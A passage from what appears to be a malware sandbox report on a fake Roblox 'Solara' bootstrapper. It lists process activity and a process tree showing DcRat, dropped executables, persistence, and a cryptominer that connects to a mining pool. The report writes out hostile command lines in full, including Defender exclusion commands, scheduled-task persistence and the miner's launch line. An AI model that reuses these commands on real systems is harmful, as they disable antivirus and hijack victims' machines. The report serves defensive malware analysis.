SeTakeOwnershipPrivilege 2424 msiexec.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 416 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 3688 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeDebugPrivilege 60 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeRestorePrivilege 2424 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SolaraBootstrapper.exeYoutube.exeResult.exeDCRatBuild.exeFrage build.exesolara.exeWScript.execmd.exeSolaraBootstrapper.exemsiexec.exeRefcrt.exedescription pid process target process PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe PID 5044 wrote to memory of 5072 5044 SolaraBootstrapper.exe Youtube.exe PID 5044 wrote to memory of 2568 5044 SolaraBootstrapper.exe faildsfsdf.exe PID 5044 wrote to memory of 2568 5044 SolaraBootstrapper.exe faildsfsdf.exe PID 5072 wrote to memory of 5100 5072 Youtube.exe Result.exe PID 5072 wrote to memory of 5100 5072 Youtube.exe Result.exe PID 5072 wrote to memory of 5100 5072 Youtube.exe Result.exe PID 5072 wrote to memory of 4140 5072 Youtube.exe DCRatBuild.exe PID 5072 wrote to memory of 4140 5072 Youtube.exe DCRatBuild.exe PID 5072 wrote to memory of 4140 5072 Youtube.exe DCRatBuild.exe PID 5072 wrote to memory of 392 5072 Youtube.exe Bloxstrap.exe PID 5072 wrote to memory of 392 5072 Youtube.exe Bloxstrap.exe PID 5072 wrote to memory of 1660 5072 Youtube.exe Frage build.exe PID 5072 wrote to memory of 1660 5072 Youtube.exe Frage build.exe PID 5072 wrote to memory of 1660 5072 Youtube.exe Frage build.exe PID 5100 wrote to memory of 3012 5100 Result.exe SolaraBootstrapper.exe PID 5100 wrote to memory of 3012 5100 Result.exe SolaraBootstrapper.exe PID 5100 wrote to memory of 3012 5100 Result.exe SolaraBootstrapper.exe PID 5100 wrote to memory of 3504 5100 Result.exe solara.exe PID 5100 wrote to memory of 3504 5100 Result.exe solara.exe PID 5100 wrote to memory of 3504 5100 Result.exe solara.exe PID 4140 wrote to memory of 1452 4140 DCRatBuild.exe WScript.exe PID 4140 wrote to memory of 1452 4140 DCRatBuild.exe WScript.exe PID 4140 wrote to memory of 1452 4140 DCRatBuild.exe WScript.exe PID 1660 wrote to memory of 904 1660 Frage build.exe WScript.exe PID 1660 wrote to memory of 904 1660 Frage build.exe WScript.exe PID 1660 wrote to memory of 904 1660 Frage build.exe WScript.exe PID 3504 wrote to memory of 3112 3504 solara.exe Conhost.exe PID 3504 wrote to memory of 3112 3504 solara.exe Conhost.exe PID 3504 wrote to memory of 3112 3504 solara.exe Conhost.exe PID 3112 wrote to memory of 1072 3112 WScript.exe cmd.exe PID 3112 wrote to memory of 1072 3112 WScript.exe cmd.exe PID 3112 wrote to memory of 1072 3112 WScript.exe cmd.exe PID 1072 wrote to memory of 4084 1072 cmd.exe Refcrt.exe PID 1072 wrote to memory of 4084 1072 cmd.exe Refcrt.exe PID 3012 wrote to memory of 4476 3012 SolaraBootstrapper.exe msiexec.exe PID 3012 wrote to memory of 4476 3012 SolaraBootstrapper.exe msiexec.exe PID 3012 wrote to memory of 4476 3012 SolaraBootstrapper.exe msiexec.exe PID 2424 wrote to memory of 3592 2424 msiexec.exe MsiExec.exe PID 2424 wrote to memory of 3592 2424 msiexec.exe MsiExec.exe PID 2424 wrote to memory of 4396 2424 msiexec.exe MsiExec.exe PID 2424 wrote to memory of 4396 2424 msiexec.exe MsiExec.exe PID 2424 wrote to memory of 4396 2424 msiexec.exe MsiExec.exe PID 4084 wrote to memory of 388 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 388 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 1116 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 1116 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 3680 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 3680 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 828 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 828 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 1996 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 1996 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 3380 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 3380 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 400 4084 Refcrt.exe schtasks.exe PID 4084 wrote to memory of 400 4084 Refcrt.exe schtasks.exe PID 4084 wrote to memory of 3688 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 3688 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 416 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 416 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 924 4084 Refcrt.exe powershell.exe PID 4084 wrote to memory of 924 4084 Refcrt.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\Youtube.exe"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\dllhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\smss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\Registry.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:3112
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\fontdrvhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\sysmon.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgZhaJuw4k.bat"8⤵PID:5448
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:5980
-
-
C:\Windows\Cursors\smss.exe"C:\Windows\Cursors\smss.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6104
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"4⤵
- Checks computer location settings
PID:1452 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "5⤵PID:5408
-
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet/ComContainerbrowserRefRuntime.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
PID:2556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wXWS1pp4ya.bat"7⤵PID:6096
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5228
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:5772
-
-
C:\Recovery\WindowsRE\RuntimeBroker.exe"C:\Recovery\WindowsRE\RuntimeBroker.exe"8⤵
- Executes dropped EXE
PID:5564
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"3⤵
- Executes dropped EXE
PID:392 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"4⤵PID:6600
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵PID:6648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Command and Scripting Interpreter: PowerShell
PID:6700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Command and Scripting Interpreter: PowerShell
PID:7124
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"5⤵PID:6724
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"6⤵PID:6832
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"5⤵PID:6276
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6136
-
-
C:\Users\Admin\Bloxstrap.exeC:\Users\Admin\Bloxstrap.exe6⤵
- Executes dropped EXE
PID:7056 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"7⤵PID:1532
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit8⤵PID:1312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"9⤵
- Command and Scripting Interpreter: PowerShell
PID:7060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"9⤵
- Command and Scripting Interpreter: PowerShell
PID:4364
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:3532
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵PID:6556
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth8⤵PID:5772
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Frage build.exe"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"4⤵
- Checks computer location settings
PID:904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "5⤵PID:5476
-
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp/Roblox.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies registry class
PID:5428 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuwvmi3t\yuwvmi3t.cmdline"7⤵
- Loads dropped DLL
PID:6404 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES470.tmp" "c:\Recovery\WindowsRE\CSCC7783D3289374321A5F2785D92A2CEE9.TMP"8⤵PID:5100
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\camgvsp2\camgvsp2.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6136 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D7.tmp" "c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP"8⤵PID:5904
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dqs4vyuy\dqs4vyuy.cmdline"7⤵
- Loads dropped DLL
PID:1508 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B2.tmp" "c:\Recovery\WindowsRE\CSC9D15F18DF25B4EBC9AFC5D7EFCDC912E.TMP"8⤵PID:5632
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\unbjjxr2\unbjjxr2.cmdline"7⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:3396 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73E.tmp" "c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP"8⤵PID:5840
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wo0r4xno\wo0r4xno.cmdline"7⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES867.tmp" "c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP"8⤵PID:5876
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avbd4xd1\avbd4xd1.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES961.tmp" "c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP"8⤵PID:376
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwun14pc\hwun14pc.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:5884 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B.tmp" "c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP"8⤵PID:6312
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zdiymwed\zdiymwed.cmdline"7⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:1312 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB65.tmp" "c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP"8⤵PID:6608
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2pkbp2db\2pkbp2db.cmdline"7⤵
- Loads dropped DLL
PID:6800 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC30.tmp" "c:\Users\Default\Pictures\CSC153B9179EE0B46AA9D569016ABEAE6.TMP"8⤵PID:6904
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2jgjupzb\2jgjupzb.cmdline"7⤵
- Loads dropped DLL
PID:6976 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC0.tmp" "c:\Recovery\WindowsRE\CSC6D4CDB6BEEFF47A79AD646A942B52992.TMP"8⤵PID:6844
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2mua0gou\2mua0gou.cmdline"7⤵
- Loads dropped DLL
PID:6964 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10A5.tmp" "c:\Users\All Users\Documents\CSC84F997DF90245D3B8FB2CA93EAEE763.TMP"8⤵PID:7068
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3fqzhcs1\3fqzhcs1.cmdline"7⤵
- Loads dropped DLL
PID:7088 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CE.tmp" "c:\DriversavessessionDlldhcp\CSC3597879E6DB949CA948CF8F65C6C1C2B.TMP"8⤵PID:6820
-
-
-
